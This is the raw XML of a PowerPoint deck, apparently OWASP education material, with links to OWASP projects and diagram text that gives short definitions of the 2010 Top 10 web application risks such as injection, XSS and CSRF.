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77" r:id="rId3"/>
    <p:sldId id="272" r:id="rId4"/>
    <p:sldId id="274" r:id="rId5"/>
    <p:sldId id="269" r:id="rId6"/>
    <p:sldId id="275" r:id="rId7"/>
    <p:sldId id="256" r:id="rId8"/>
    <p:sldId id="258" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="260" r:id="rId11"/>
    <p:sldId id="259" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="264" r:id="rId15"/>
    <p:sldId id="266" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="278" r:id="rId18"/>
    <p:sldId id="279" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="281" r:id="rId21"/>
    <p:sldId id="286" r:id="rId22"/>
    <p:sldId id="280" r:id="rId2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a:srgbClr val="F9FBFD"/>
    <a:srgbClr val="4F81BD"/>
    <a:srgbClr val="4F5981"/>
    <a:srgbClr val="E0E9F4"/>
    <a:srgbClr val="FF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740" autoAdjust="0"/>
    <p:restoredTop sz="95335" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-1194" y="17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hyperlink" Target="http://www.owasp.org/index.php/WebGoat" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Guide" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/OWASP_Education_Presentation" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_Education_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/data3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3"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www.owasp.org/index.php/WebGoat" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Guide" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/OWASP_Education_Presentation" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_Education_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Category:OWASP_AppSec_Conference"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www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Security_Testing_-_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dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A1 – Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>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C7383E11-2997-46ED-9CDE-19D4351797B7}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A2 – Cross-Site Scripting (XSS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7480DFFA-AE50-4F5A-9B34-549DC64CBECE}" type="parTrans" cxnId="{64EA57B5-69CD-49C3-9B03-E44D15D0B36F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{528554B3-3377-4274-ADB1-6970BE43DEBB}" type="sibTrans" cxnId="{64EA57B5-69CD-49C3-9B03-E44D15D0B36F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1B85367-743A-4C9F-A891-07038BBF96F2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A3 – Broken Authentication and Session Management</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53C4939E-201B-4ED1-9161-7E355E0F4074}" type="parTrans" cxnId="{D7526BF8-3D84-473A-BD13-72C4368227C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{68A5A658-9210-4933-94F8-E5EB41BF4147}" type="sibTrans" cxnId="{D7526BF8-3D84-473A-BD13-72C4368227C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BD590FA-9231-49C0-97E0-217A496C2237}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A4 – Insecure Direct Object References</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09FCF6D7-DCB3-4316-B5AF-4A79E28A3947}" type="parTrans" cxnId="{BA4D9481-1FA9-4104-AE41-818FA1E75DC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECA2D58B-5985-4D42-8ACF-DA4EEB388D97}" type="sibTrans" cxnId="{BA4D9481-1FA9-4104-AE41-818FA1E75DC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C03D2B45-045F-419F-9A43-BA3CEAFBC613}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A5 – Cross-Site Request Forgery (CSRF)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2A2FA93-5279-4E69-A1CA-8046392DF8BB}" type="parTrans" cxnId="{84313AD1-D806-4F50-906D-164AF3200717}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D3D0307-BCC6-4666-B008-AB05B3454592}" type="sibTrans" cxnId="{84313AD1-D806-4F50-906D-164AF3200717}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{47E9EF4E-AA7A-42E3-9DB3-FF494FD47A04}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Injection flaws, such as SQL, OS, and LDAP injection, occur when </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>untrusted</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t> data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00FA895F-EA9F-49D0-B094-026497ADB1F9}" type="parTrans" cxnId="{E7AF4FA8-50BA-4438-88DC-24520061291C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFBA57D2-1B10-41DD-9593-2DE28EC9DE88}" type="sibTrans" cxnId="{E7AF4FA8-50BA-4438-88DC-24520061291C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA7DD3FF-C2BA-419E-88D3-4DE8B0D3FE4D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>XSS flaws occur whenever an application takes </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>untrusted</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t> data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3E3EC78-9BBC-41A1-9C38-D8A0F920D1EE}" type="parTrans" cxnId="{CEABDA5D-2CCD-47EA-91C3-340B08D5CA35}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35D55CF6-A108-42C3-AD8E-0484F859C755}" type="sibTrans" cxnId="{CEABDA5D-2CCD-47EA-91C3-340B08D5CA35}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A1C44CE-CCA3-4BD0-B54E-89DB7E3E4543}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or  exploit other implementation flaws to assume other users’ identities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53F5BEB3-3EDE-4323-8D58-1235F631434F}" type="parTrans" cxnId="{C09CDA34-B6A3-4717-8DE9-255D336A9884}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D06F3C25-B302-446A-981A-0C9D3ABE828A}" type="sibTrans" cxnId="{C09CDA34-B6A3-4717-8DE9-255D336A9884}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14EF3D90-B7BF-472E-9422-7B5778E09D13}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F9B48C0-85AA-453B-B650-01AA8ED87AF6}" type="parTrans" cxnId="{4EC8A31B-A603-4169-B3AF-6B7CC5FC3144}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{632CD812-98A5-4F26-9F34-EC4F9D15FA07}" type="sibTrans" cxnId="{4EC8A31B-A603-4169-B3AF-6B7CC5FC3144}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2CA751A3-FAC5-4333-8C12-EE4CE8E8AB39}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="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a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB3ED1EB-ADBC-4177-8BC2-4E567542EC6C}" type="parTrans" cxnId="{CD6092A4-C4DC-45ED-A751-1B3F7A06E9AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2286D90-3029-415D-AE6F-2F380A320E85}" type="sibTrans" cxnId="{CD6092A4-C4DC-45ED-A751-1B3F7A06E9AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25555832-CE6E-49DC-8853-636E1959542E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Applications frequently fail to authenticate, encrypt, and protect the confidentiality and integrity of sensitive network traffic. When they do, they sometimes support weak algorithms, use expired or invalid certificates, or do not use them correctly. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C354702-E349-4CDA-99AD-1E32BD6F3EC6}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A9 - Insufficient Transport Layer Protection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2E7E824-9857-4FA1-8D4C-966BADFFD02E}" type="sibTrans" cxnId="{CCCFD819-1397-40BF-B77A-80238AB85FB6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E4FB5F1-8123-4CBF-ABA0-4D9C713C7B8A}" type="parTrans" cxnId="{CCCFD819-1397-40BF-B77A-80238AB85FB6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22A8181F-3DA9-4EBB-9991-856323D70780}" type="sibTrans" cxnId="{D6BA2657-A55D-4DAB-8EE5-B6CD8738C915}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{949AE632-8A31-479F-9DE5-DEB648FA5F47}" type="parTrans" cxnId="{D6BA2657-A55D-4DAB-8EE5-B6CD8738C915}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5A8502D-52C4-4B4A-ACF7-0A37A965A8B6}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Many web applications check URL access rights before rendering protected links and buttons. However, applications need to perform similar access control checks each time these pages are accessed, or attackers will be able to forge URLs to access these hidden pages anyway.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09240EC7-522E-4395-8D61-1A972E9AC8FE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A7 – Insecure Cryptographic Storage</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC6AC552-EC1D-4C41-BC2A-2A31755C14D6}" type="sibTrans" cxnId="{D12E2220-E3D4-4AD9-8C72-73CD40A20BF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1C6D0C2-4799-4B09-8EDB-71B4CE380B3C}" type="parTrans" cxnId="{D12E2220-E3D4-4AD9-8C72-73CD40A20BF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F009B1C-CA71-4886-8BD8-1834F3031679}" type="sibTrans" cxnId="{812FD558-0CC1-4C36-B25E-18FCE06EA12D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{19F46D76-A2BD-46B9-94FE-57535FE3C1A8}" type="parTrans" cxnId="{812FD558-0CC1-4C36-B25E-18FCE06EA12D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5DA0AAD8-DB42-4198-B614-1D5996278F65}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
